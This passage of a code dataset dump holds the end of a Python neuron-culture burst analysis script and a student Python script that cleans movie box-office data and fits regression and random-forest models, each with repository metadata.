ignore_index=True)\n if key == \"isis\":\n dataframes[key][\"logISI\"] = dataframes[key].apply(\n lambda row: np.log10(row[\"ISI\"]), axis=1\n )\n\n # for the simulations we append a suffix because layouts `k=...` are not unique.\n if \"sim\" in args.etype:\n suffix = args.etype[3:]\n else:\n suffix = \"\"\n\n meta_data = dict()\n meta_data[\"remove_null_sequences\"] = remove_null_sequences\n meta_data[\"time_bin_size_for_rij\"] = time_bin_size_for_rij\n meta_data[\"bs_large\"] = bs_large(args.etype)\n meta_data[\"threshold_factor\"] = threshold_factor(args.etype)\n meta_data[\"etype\"] = args.etype\n meta_data[\"created\"] = datetime.datetime.now().isoformat()\n meta_data[\"input_base\"] = args.input_base\n meta_data[\"output_path\"] = output_path\n meta_data[\"save_analysed_h5f\"] = save_analysed_h5f\n\n 
dict_of_dfs_to_hdf5(dataframes, f\"{output_path}/{layout}{suffix}.hdf5\", meta_data)\n\n\n# ------------------------------------------------------------------------------ #\n# helpers\n# ------------------------------------------------------------------------------ #\n\n\ndef prepare_file(etype, condition, path_prefix):\n if \"exp\" in etype:\n h5f = ah.load_experimental_files(\n path_prefix=f\"{path_prefix}/\", condition=condition\n )\n elif \"sim\" in etype:\n h5f = ah.prepare_file(path_prefix)\n\n ah.find_rates(h5f, bs_large=bs_large(etype))\n ah.find_system_bursts_from_global_rate(\n h5f,\n rate_threshold=threshold_factor(etype) * np.nanmax(h5f[\"ana.rates.system_level\"]),\n merge_threshold=0.1,\n skip_sequences=False,\n )\n\n # this is a global setting for now\n if remove_null_sequences:\n ah.remove_bursts_with_sequence_length_null(h5f)\n\n ah.find_ibis(h5f)\n ah.find_participating_fraction_in_bursts(h5f)\n ah.find_isis(h5f)\n\n return h5f\n\n\ndef dict_of_dfs_to_hdf5(df_dict, df_path, meta=dict()):\n os.makedirs(os.path.dirname(df_path), exist_ok=True)\n for key in df_dict.keys():\n df = df_dict[key]\n df.to_hdf(df_path, f\"/data/df_{key}\", complevel=6)\n\n # save some metadata\n import h5py\n\n with h5py.File(df_path, \"a\") as f:\n for key in meta.keys():\n f.create_dataset(f\"/meta/{key}\", data=meta[key])\n\n\nif __name__ == \"__main__\":\n with logging_redirect_tqdm():\n main()\n", "repo_name": "pSpitzner/stimulating_modular_cultures", "sub_path": "ana/process_conditions.py", "file_name": "process_conditions.py", "file_ext": "py", "file_size_in_byte": 22538, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.basicConfig", "line_number": 28, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 32, "usage_type": "call"}, {"api_name": "warnings.filterwarnings", "line_number": 34, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 79, "usage_type": "call"}, {"api_name": "tqdm.auto.tqdm", "line_number": 152, "usage_type": "call"}, {"api_name": "tqdm.auto.tqdm", "line_number": 170, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 176, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 178, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 182, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 186, "usage_type": "call"}, {"api_name": "tqdm.auto.tqdm", "line_number": 193, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 196, "usage_type": "call"}, {"api_name": "os.path", "line_number": 196, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 223, "usage_type": "call"}, {"api_name": "plot_helper.overview_dynamic", "line_number": 224, "usage_type": "call"}, {"api_name": "numpy.nanargmax", "line_number": 231, "usage_type": "call"}, {"api_name": "numpy.fmax", "line_number": 236, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.close", "line_number": 239, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 239, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 246, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 247, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 250, "usage_type": "call"}, {"api_name": "ana_helper.find_onset_durations", "line_number": 253, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 258, "usage_type": "attribute"}, {"api_name": 
"ana_helper.find_burst_core_delays", "line_number": 262, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 263, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 264, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 267, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 292, "usage_type": "call"}, {"api_name": "ana_helper.find_rij", "line_number": 308, "usage_type": "call"}, {"api_name": "numpy.fill_diagonal", "line_number": 311, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 311, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 313, "usage_type": "call"}, {"api_name": "numpy.nanmean", "line_number": 324, "usage_type": "call"}, {"api_name": "numpy.nanmedian", "line_number": 325, "usage_type": "call"}, {"api_name": "ana_helper.find_rij_pairs", "line_number": 336, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 339, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 345, "usage_type": "call"}, {"api_name": "ana_helper.find_rij", "line_number": 357, "usage_type": "call"}, {"api_name": "numpy.fill_diagonal", "line_number": 358, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 358, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 360, "usage_type": "call"}, {"api_name": "numpy.nanmean", "line_number": 371, "usage_type": "call"}, {"api_name": "numpy.nanmedian", "line_number": 372, "usage_type": "call"}, {"api_name": "ana_helper.find_rij_pairs", "line_number": 376, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 382, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 388, "usage_type": "call"}, {"api_name": "ana_helper.find_rij", "line_number": 400, "usage_type": "call"}, {"api_name": "numpy.fill_diagonal", "line_number": 401, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 401, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 403, "usage_type": "call"}, {"api_name": "ana_helper._functional_complexity", "line_number": 419, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 420, "usage_type": "call"}, {"api_name": "numpy.nanmean", "line_number": 427, "usage_type": "call"}, {"api_name": "numpy.nanmedian", "line_number": 428, "usage_type": "call"}, {"api_name": "numpy.nanmean", "line_number": 429, "usage_type": "call"}, {"api_name": "numpy.nanmean", "line_number": 430, "usage_type": "call"}, {"api_name": "numpy.nanmedian", "line_number": 431, "usage_type": "call"}, {"api_name": "numpy.nanmean", "line_number": 432, "usage_type": "call"}, {"api_name": "numpy.nanmedian", "line_number": 433, "usage_type": "call"}, {"api_name": "numpy.nanmean", "line_number": 442, "usage_type": "call"}, {"api_name": "numpy.nanmedian", "line_number": 443, "usage_type": "call"}, {"api_name": "bitsandbobs.hi5.recursive_write", "line_number": 451, "usage_type": "call"}, {"api_name": "bitsandbobs.hi5", "line_number": 451, "usage_type": "attribute"}, {"api_name": "bitsandbobs.hi5.close_hot", "line_number": 458, "usage_type": "call"}, {"api_name": "bitsandbobs.hi5", "line_number": 458, "usage_type": "attribute"}, {"api_name": "pandas.concat", "line_number": 463, "usage_type": "call"}, {"api_name": "numpy.log10", "line_number": 466, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 481, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 481, "usage_type": "attribute"}, {"api_name": 
"ana_helper.load_experimental_files", "line_number": 496, "usage_type": "call"}, {"api_name": "ana_helper.prepare_file", "line_number": 500, "usage_type": "call"}, {"api_name": "ana_helper.find_rates", "line_number": 502, "usage_type": "call"}, {"api_name": "ana_helper.find_system_bursts_from_global_rate", "line_number": 503, "usage_type": "call"}, {"api_name": "numpy.nanmax", "line_number": 505, "usage_type": "call"}, {"api_name": "ana_helper.remove_bursts_with_sequence_length_null", "line_number": 512, "usage_type": "call"}, {"api_name": "ana_helper.find_ibis", "line_number": 514, "usage_type": "call"}, {"api_name": "ana_helper.find_participating_fraction_in_bursts", "line_number": 515, "usage_type": "call"}, {"api_name": "ana_helper.find_isis", "line_number": 516, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 522, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 522, "usage_type": "call"}, {"api_name": "os.path", "line_number": 522, "usage_type": "attribute"}, {"api_name": "h5py.File", "line_number": 530, "usage_type": "call"}, {"api_name": "tqdm.contrib.logging.logging_redirect_tqdm", "line_number": 536, "usage_type": "call"}]} +{"seq_id": "72996166593", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 07 13:27:11 2016\n\n@author: Sarick\n\"\"\"\n\n# -*- coding: utf-8 -*-\nimport pandas as pd\nfrom dateutil.parser import parse\nimport os\nos.chdir(\"C:\\\\Users\\\\Sarick\\\\Documents\\\\Python Scripts\\\\Document_Clustering\")\n#%%\n\nimport re\nr = re.compile(r'%') \nfile = \"finish.csv\"\n#def scrubber(file):\ndf = pd.read_csv(file)\ndf = df[~df[df.columns[4]].duplicated()]\ndf.columns = range(len(df.columns))\ndf.drop([0], axis = 1, inplace = True)\ndf.columns = range(len(df.columns))\ndf.drop([0, 1, 7, 11, 12, 13, 14, 15, 17, 20, 24, 25, 32, 33, 40, 41, 48], axis = 1, inplace = True)\n#GPT = gross per theater\n#TG = total gross\n\ncolumns=['Release Date','Title','Production Budget','Domestic Gross','Worldwide Gross','Genre','Runtime','MPAA','Critic Rating','Weekend 1 Rank','Weekend 1 Gross','Weekend 1 Theaters','Weekend 1 GPT','Weekend 1 TG', 'Weekend 2 Rank','Weekend 2 Gross','Weekend 2 Change','Weekend 2 Theaters','Weekend 2 GPT','Weekend 2 TG', 'Weekend 3 Rank','Weekend 3 Gross','Weekend 3 Change','Weekend 3 Theaters','Weekend 3 GPT','Weekend 3 TG', 'Weekend 4 Rank','Weekend 4 Gross','Weekend 4 Change','Weekend 4 Theaters','Weekend 4 GPT','Weekend 4 TG']\n\n#df.drop([47, 46, 45, 44, 43, 42, 39, 38, 37 ,36, 35, 34], axis = 1, inplace=True)\n\n\ndf.columns = columns\ndf.dropna(inplace=True, thresh = 26) \n#df3 = df2[(df2['Weekend 2 Change'].str.contains('%')) | (df2['Weekend 3 Change'].str.contains('%')) | (df2['Weekend 4 Change'].str.contains('%'))]\n\ndf = df[(df['Weekend 3 Change'].str.contains('%'))]\ndf = df[(df['Weekend 2 Change'].str.contains('%'))]\nfor column in columns:\n try:\n df[column] = df[column].map(lambda x: x.replace(',',''))\n df[column] = df[column].map(lambda x: x.replace('$',''))\n df[column] = df[column].map(lambda x: x.replace('G(Rating', 'G'))\n df[column] = df[column].map(lambda x: x.replace('GG', 'G'))\n df[column] = df[column].map(lambda x: x.replace('n/c', '0'))\n except (AttributeError):\n pass \n\ndf.fillna(0, inplace=True)\n\ndf['Weekend 2 Theaters'] = df['Weekend 2 Theaters'].replace(',','').astype(int)\ndf['Weekend 3 Theaters'] = df['Weekend 3 Theaters'].replace(',','').astype(int)\ndf.drop(['Weekend 4 Theaters'], axis = 1, inplace = True)\ndf.drop(['Weekend 4 Rank','Weekend 4 Gross','Weekend 4 
Change','Weekend 4 GPT','Weekend 4 TG'], axis = 1, inplace = True)\n\ndf['Runtime'] = df['Runtime'].map(lambda x: int(str(x).split()[0])) \ndf['MPAA'] = df['MPAA'].map(lambda x: str(x).split()[0])\ndf['Weekend 1 Rank'] = df['Weekend 1 Rank'].map(lambda x: str(x))\ndf['Weekend 2 Change'] = df['Weekend 2 Change'].map(lambda x: int(x.replace('%','')))\ndf['Weekend 3 Change'] = df['Weekend 3 Change'].map(lambda x: int(x.replace('%','')))\ndf['Release Date'] = df['Release Date'].apply(lambda x: parse(str(x)))\ndf.to_csv('thenumbers_5000_scrubbed_v2.csv',index=False)\n#%%\nimport re\ndf = pd.read_csv('thenumbers_5000_scrubbed_v2.csv')\nlist_of_rating = df['Critic Rating'].tolist()\n\ntotal_rating = [] \nfor rating_string in list_of_rating:\n if rating_string == 'nan' or len(rating_string)==0 or re.findall('\\d+%', rating_string)==[]:\n total_rating.append([0,0])\n else:\n list_pair = re.findall('\\d+%',rating_string)\n total_rating.append(list_pair)\n \nfor a, i in enumerate(list(total_rating)):\n if len(i)<2:\n # iterate over a copy: removing from the list while iterating over it skipped elements\n total_rating.remove(i)\n df.drop(a, axis = 0, inplace=True)\n\n \ncritic_rate, audience_rate = zip(*total_rating)\ndf['Critic Rate'] = critic_rate\ndf['Audience Rate'] = audience_rate\ndf.to_csv('thenumbers_5000_scrubbed_v3.csv',index=False) \n\n\ndf['Critic Rate'] = df['Critic Rate'].map(lambda x: int(str(x).replace('%','')))\ndf['Audience Rate'] = df['Audience Rate'].map(lambda x: int(str(x).replace('%','')))\n\n\n#%%\n#Linear Regression\nimport seaborn as sns\nimport numpy as np\n\n#Check Column Types\ndf.columns.to_series().groupby(df.dtypes).groups\n#Finish converting all columns to numeric\ndf[['Production Budget', 'Domestic Gross', 'Worldwide Gross', 'Weekend 1 Rank','Weekend 1 Gross','Weekend 1 Theaters','Weekend 1 GPT','Weekend 1 TG', 'Weekend 2 Rank','Weekend 2 Gross','Weekend 2 Change','Weekend 2 Theaters','Weekend 2 GPT','Weekend 2 TG', 'Weekend 3 Rank','Weekend 3 Gross','Weekend 3 Change','Weekend 3 Theaters','Weekend 3 GPT','Weekend 3 TG', 'Runtime']]= df[['Production Budget', 'Domestic Gross','Worldwide Gross', 'Weekend 1 Rank','Weekend 1 Gross','Weekend 1 Theaters','Weekend 1 GPT','Weekend 1 TG', 'Weekend 2 Rank','Weekend 2 Gross','Weekend 2 Change','Weekend 2 Theaters','Weekend 2 GPT','Weekend 2 TG', 'Weekend 3 Rank','Weekend 3 Gross','Weekend 3 Change','Weekend 3 Theaters','Weekend 3 GPT','Weekend 3 TG', 'Runtime']].apply(pd.to_numeric, errors='coerce')\n\n\ndf[['Production Budget', 'Domestic Gross','Worldwide Gross', 'Weekend 1 Rank','Weekend 1 Gross','Weekend 1 Theaters','Weekend 1 GPT','Weekend 1 TG', 'Weekend 2 Rank','Weekend 2 Gross','Weekend 2 Change','Weekend 2 Theaters','Weekend 2 GPT','Weekend 2 TG', 'Weekend 3 Rank','Weekend 3 Gross','Weekend 3 Change','Weekend 3 Theaters','Weekend 3 GPT','Weekend 3 TG', 'Runtime', 'Critic Rate', 'Audience Rate']] = df[['Production Budget', 'Domestic Gross','Worldwide Gross', 'Weekend 1 Rank','Weekend 1 Gross','Weekend 1 Theaters','Weekend 1 GPT','Weekend 1 TG', 'Weekend 2 Rank','Weekend 2 Gross','Weekend 2 Change','Weekend 2 Theaters','Weekend 2 GPT','Weekend 2 TG', 'Weekend 3 Rank','Weekend 3 Gross','Weekend 3 Change','Weekend 3 Theaters','Weekend 3 GPT','Weekend 3 TG', 'Runtime', 'Critic Rate', 'Audience Rate']].replace(0 , df[['Production Budget', 'Domestic Gross','Worldwide Gross', 'Weekend 1 Rank','Weekend 1 Gross','Weekend 1 Theaters','Weekend 1 GPT','Weekend 1 TG', 'Weekend 2 Rank','Weekend 2 Gross','Weekend 2 Change','Weekend 2 Theaters','Weekend 2 GPT','Weekend 2 TG', 'Weekend 3 Rank','Weekend 3 Gross','Weekend 3 Change','Weekend 3 Theaters','Weekend 3 GPT','Weekend 3 TG', 'Runtime', 'Critic Rate', 'Audience Rate']].mean()) # assign the result back; replace(..., inplace=True) returned None\n\n\n#Do this call below for every variable to fill the dataframe up\ndf['Audience Rate'].replace(0, df['Audience Rate'].mean(), inplace = True)\ndf4 = df.dropna()\ndf4.to_csv(\"movies_5000_zeros_filledv5\")\n#%%\n# -*- coding: utf-8 -*-\n\ndef 
adj_r2_score(model,y,ypred):\n\tadj = 1 - float(len(y)-1)/(len(y)-len(model.coef_)-1)*(1 - metrics.r2_score(y,ypred))\n\treturn adj\n\ndf = pd.read_csv('movies_5000_zeros_filled.csv')\nfrom sklearn.model_selection import RandomizedSearchCV\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn import metrics\nfrom sklearn.model_selection import train_test_split\ndf4.drop(['Critic Rating'], axis = 1, inplace = True)\ndf4['MPAA'] = df4['MPAA'].astype(str)\n\ntranslator = {'M/PG':'PG-13','R(Rated':'R','GG(Rating':'G','Open':'G','G(Rating':'G','Not':'PG-13'}\ndf4['MPAA']=df4['MPAA'].replace(translator)\n\ndf4.to_csv('movies_5000_zeros_filledv6')\n\ndf_dummies = pd.get_dummies(df4['Genre'], drop_first=True) \ndf_dummies = pd.concat([df_dummies, pd.get_dummies(df4['MPAA'], drop_first=True)], axis=1)\ndf_regression = df4[['Production Budget', 'Weekend 2 Change', 'Weekend 3 Change', 'Weekend 1 Theaters', 'Weekend 2 Theaters', 'Weekend 3 Theaters', 'Weekend 1 GPT', 'Weekend 2 GPT', 'Weekend 3 GPT', 'Critic Rate', 'Audience Rate']]\ndf_regression = pd.concat([df_regression, df_dummies], axis =1, join_axes=[df_regression.index])\n\n\n#Coefficient Plot\nimport matplotlib.pyplot as plt # needed here: plt is used before the later import\n\nplt.plot(range(3), [0.494189, 0.512570,0.591596])\nplt.xticks(range(3), ['Weekend 1', 'Weekend 2', 'Weekend 3'])\nplt.ylabel(\"Correlation Coefficient\")\n\n\n\n#Plot of R2\nwidth = .35\nplt.bar(range(4), [0.55459218078608719, 0.64049897239556585, .675,0.856], width)\nplt.xticks(range(4), [ 'Elastic Net+WW','Elastic Net+Domestic','RF + WW', 'RF+Domestic'])\nplt.ylabel(\"R2 Score\")\n\nwidth = .35\nplt.bar(range(4), [0.55459218078608719,0.79389354806433121, 0.71255505295054022, 0.77758631466092465], width, align='center')\nplt.xticks(range(4), [ 'G','PG','PG-13', 'R'])\nplt.ylabel(\"R2 Score\")\n\n\n\nX,y = df_regression,df4['Domestic Gross']\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)\nfrom sklearn.linear_model import LinearRegression\nmodel = LinearRegression().fit(X_train, y_train)\ny_pred = model.predict(X_test)\nmetrics.r2_score(y_test, y_pred)\nmetrics.mean_squared_error(y_test, y_pred)\nmodel.coef_\nresiduals = y_test - y_pred # LinearRegression has no residuals_ attribute; compute them explicitly\n\n\n \n\n# build a classifier\nclf = RandomForestRegressor(n_estimators = 100, max_depth = 7, max_features = 11)\nclf.fit(X_train, y_train)\nclf.feature_importances_\n\n\nimport matplotlib.pyplot as plt \nimport seaborn as sns\n\nplt.barh(range(11), clf.feature_importances_)\nplt.yticks(range(11),['Production Budget', 'Weekend 2 Change', 'Weekend 3 Change', 'Weekend 1 Theaters', 'Weekend 2 Theaters', 'Weekend 3 Theaters', 'Weekend 1 GPT', 'Weekend 2 GPT', 'Weekend 3 GPT', 'Critic Rate', 'Audience Rate'])\nplt.xlabel('Importances')\nplt.ylabel('Features')\n\nplt.scatter(df4['Weekend 3 Theaters'], df4['Worldwide Gross'])\nplt.xlabel('Weekend 3 Theaters')\nplt.ylabel('Worldwide Gross')\n\nplt.scatter(df4['Weekend 2 Theaters'], df4['Worldwide Gross'])\nplt.xlabel('Weekend 2 Theaters')\nplt.ylabel('Worldwide Gross')\n\n\nplt.scatter(df4['Weekend 1 Theaters'], df4['Worldwide Gross'])\nplt.xlabel('Weekend 1 Theaters')\nplt.ylabel('Worldwide Gross')\n\nfrom scipy.stats import randint as sp_randint\n# specify parameters and distributions to sample from\nparam_dist = {\"max_depth\": sp_randint(1, 10),\n \"max_features\": sp_randint(1, 10)} \n\nclf = RandomForestRegressor(n_estimators=100)\nn_iter_search = 20\nrandom_search = RandomizedSearchCV(clf, param_distributions=param_dist, n_iter=n_iter_search, cv = 5)\nrandom_search.fit(X_train, 
y_train)\ny_pred2=random_search.predict(X_test)\nmetrics.r2_score(y_test, y_pred2)\nmetrics.mean_squared_error(y_test, y_pred2)\nimport matplotlib.pyplot as plt\nplt.scatter(y_pred2, y_test)\n\n#Append df_dummies_genre to each and then regress\ndf_dummies_genre = pd.get_dummies(df4['Genre'], drop_first=True) \ndf_R = df4[df4['MPAA']=='R']\ndf_R= df_R[['Production Budget','Worldwide Gross', 'Weekend 2 Change', 'Weekend 3 Change', 'Weekend 1 Theaters', 'Weekend 2 Theaters', 'Weekend 3 Theaters', 'Weekend 1 GPT', 'Weekend 2 GPT', 'Weekend 3 GPT', 'Critic Rate', 'Audience Rate']]\ndf_R = pd.concat([df_R, df_dummies_genre], axis =1, join_axes=[df_R.index])\n\nX,y = df_R.drop('Worldwide Gross', axis = 1),df_R['Worldwide Gross']\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)\nparam_dist = {\"max_depth\": sp_randint(1, 10),\n \"max_features\": sp_randint(1, 10)} \n\nclf = RandomForestRegressor(n_estimators=100)\nn_iter_search = 20\nrandom_search = RandomizedSearchCV(clf, param_distributions=param_dist, n_iter=n_iter_search, cv = 5)\nrandom_search.fit(X_train, y_train)\ny_pred2=random_search.predict(X_test)\nmetrics.r2_score(y_test, y_pred2)\nmetrics.mean_squared_error(y_test, y_pred2)\nimport matplotlib.pyplot as plt\nplt.scatter(y_pred2, y_test)\nplt.xlabel('Predicted')\nplt.ylabel('Observed')\n\n\n\n\ndf_PG13 = df4[df4['MPAA']=='PG-13']\ndf_PG13= df_PG13[['Production Budget','Worldwide Gross', 'Weekend 2 Change', 'Weekend 3 Change', 'Weekend 1 Theaters', 'Weekend 2 Theaters', 'Weekend 3 Theaters', 'Weekend 1 GPT', 'Weekend 2 GPT', 'Weekend 3 GPT', 'Critic Rate', 'Audience Rate']]\ndf_PG13 = pd.concat([df_PG13, df_dummies_genre], axis =1, join_axes=[df_PG13.index])\n\nX,y = df_PG13.drop('Worldwide Gross', axis = 1),df_PG13['Worldwide Gross']\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)\nparam_dist = {\"max_depth\": sp_randint(1, 10),\n \"max_features\": sp_randint(1, 10)} \n\nclf = RandomForestRegressor(n_estimators=100)\nn_iter_search = 20\nrandom_search = RandomizedSearchCV(clf, param_distributions=param_dist, n_iter=n_iter_search, cv = 5)\nrandom_search.fit(X_train, y_train)\ny_pred2=random_search.predict(X_test)\nmetrics.r2_score(y_test, y_pred2)\nmetrics.mean_squared_error(y_test, y_pred2)\nimport matplotlib.pyplot as plt\nplt.scatter(y_pred2, y_test)\nplt.xlabel('Predicted')\nplt.ylabel('Observed')\n\n\n\ndf_PG = df4[df4['MPAA']=='PG']\ndf_PG= df_PG[['Production Budget','Worldwide Gross', 'Weekend 2 Change', 'Weekend 3 Change', 'Weekend 1 Theaters', 'Weekend 2 Theaters', 'Weekend 3 Theaters', 'Weekend 1 GPT', 'Weekend 2 GPT', 'Weekend 3 GPT', 'Critic Rate', 'Audience Rate']]\ndf_PG = pd.concat([df_PG, df_dummies_genre], axis =1, join_axes=[df_PG.index])\n\nX,y = df_PG.drop('Worldwide Gross', axis = 1),df_PG['Worldwide Gross']\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)\nparam_dist = {\"max_depth\": sp_randint(1, 10),\n \"max_features\": sp_randint(1, 10)} \n\nclf = RandomForestRegressor(n_estimators=100)\nn_iter_search = 20\nrandom_search = RandomizedSearchCV(clf, param_distributions=param_dist, n_iter=n_iter_search, cv = 5)\nrandom_search.fit(X_train, y_train)\ny_pred2=random_search.predict(X_test)\nmetrics.r2_score(y_test, y_pred2)\nmetrics.mean_squared_error(y_test, y_pred2)\nimport matplotlib.pyplot as plt\nplt.scatter(y_pred2, y_test)\nplt.xlabel('Predicted')\nplt.ylabel('Observed')\n\ndf_G = df4[df4['MPAA']=='G']\ndf_G= df_G[['Production 
Budget','Worldwide Gross', 'Weekend 2 Change', 'Weekend 3 Change', 'Weekend 1 Theaters', 'Weekend 2 Theaters', 'Weekend 3 Theaters', 'Weekend 1 GPT', 'Weekend 2 GPT', 'Weekend 3 GPT', 'Critic Rate', 'Audience Rate']]\ndf_G = pd.concat([df_G, df_dummies_genre], axis =1, join_axes=[df_G.index])\n\nX,y = df_G.drop('Worldwide Gross', axis = 1),df_G['Worldwide Gross']\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)\nparam_dist = {\"max_depth\": sp_randint(1, 10),\n \"max_features\": sp_randint(1, 10)} \n\nclf = RandomForestRegressor(n_estimators=100)\nn_iter_search = 20\nrandom_search = RandomizedSearchCV(clf, param_distributions=param_dist, n_iter=n_iter_search, cv = 5)\nrandom_search.fit(X_train, y_train)\ny_pred2=random_search.predict(X_test)\nmetrics.r2_score(y_test, y_pred2)\nmetrics.mean_squared_error(y_test, y_pred2)\nimport matplotlib.pyplot as plt\nplt.scatter(y_pred2, y_test)\nplt.xlabel('Predicted')\nplt.ylabel('Observed')\n#%%\nmodel.fit(X_train, y_train)\ny_pred = model.predict(X_test)\nmetrics.r2_score(y_test, y_pred)\n\n\n\ndf_regression = df4[['Production Budget', 'Weekend 3 Theaters', 'Weekend 1 GPT', 'Weekend 2 GPT', 'Weekend 3 GPT']]\ndf_regression = pd.concat([df_regression, df_dummies], axis =1, join_axes=[df_regression.index])\nX,y = df_regression,df4['Worldwide Gross']\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)\nmodel = LinearRegression()\nmodel.fit(X_train, y_train)\ny_pred = model.predict(X_test)\nmetrics.r2_score(y_test, y_pred)\n\n\n\n\n\n\n\n\n", "repo_name": "YaoNiMing/privateML", "sub_path": "projects/02-luther/submissions/SarickShah/LutherProject.py", "file_name": "LutherProject.py", "file_ext": "py", "file_size_in_byte": 14319, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.chdir", "line_number": 12, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 16, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 19, "usage_type": "call"}, {"api_name": "dateutil.parser.parse", "line_number": 61, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 65, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 70, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 73, "usage_type": "call"}, {"api_name": "pandas.to_numeric", "line_number": 101, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 118, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 131, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 132, "usage_type": "call"}, {"api_name": "pandas.get_dummies", "line_number": 132, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 134, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 160, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 162, "usage_type": "call"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 164, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 164, "usage_type": "name"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 165, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 165, "usage_type": "name"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 173, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.barh", "line_number": 181, "usage_type": 
"call"}, {"api_name": "matplotlib.pyplot", "line_number": 181, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.yticks", "line_number": 182, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 182, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 183, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 183, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 184, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 184, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 186, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 186, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 187, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 187, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 188, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 188, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 190, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 190, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 191, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 191, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 192, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 192, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 195, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 195, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 196, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 196, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 197, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 197, "usage_type": "name"}, {"api_name": "scipy.stats.randint", "line_number": 201, "usage_type": "call"}, {"api_name": "scipy.stats.randint", "line_number": 202, "usage_type": "call"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 204, "usage_type": "call"}, {"api_name": "sklearn.model_selection.RandomizedSearchCV", "line_number": 206, "usage_type": "call"}, {"api_name": "sklearn.metrics.r2_score", "line_number": 209, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 209, "usage_type": "name"}, {"api_name": 